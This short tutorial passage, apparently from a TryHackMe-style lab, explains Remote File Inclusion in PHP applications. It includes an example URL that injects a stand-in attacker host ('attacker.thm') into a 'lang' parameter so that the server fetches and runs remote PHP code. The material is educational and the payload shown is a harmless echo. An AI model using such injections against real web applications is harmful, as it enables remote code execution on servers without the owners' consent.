Remote File Inclusion is a technique to include remote files and into a vulnerable application. Like Local File Inclusion, the RFI occurs when improperly sanitizing user input, allowing an attacker to inject an external URL into include function.
One requirement for RFI is that the allow_url_fopen option needs to be on.
The risk of RFI is higher than LFI since RFI vulnerabilities allow an attacker to gain Remote Command Execution (RCE) on the server. Other consequences of a successful RFI attack include:
- Sensitive Information Disclosure
- Cross-site Scripting (xss)
- Denial of Service
An external server hosting malicious files must communicate with the application server for a successful RFI attack. The malicious file is injected into the include fn via HTTP requests, and the content of the malicious file executes on the vulnerable application server.
Example
Let's say that the attacker hosts a PHP file on their own server http://attacker.thm/cmd.txt where cmd.txt contains PHP code:
<?php echo "Hello World"; ?>First, the attacker injects the malicious URL, which points to the attacker's server, such as
http://webapp.thm/index.php?lang=http://attacker.thm/cmd.txtIf there is no input validation, then the malicious URL passes into include. Next, the web app server will send a GET request to the malicious server to fetch the file. As a result, the web app includes the remote file into include function to execute the PHP file within the page and send the execution content to the attacker.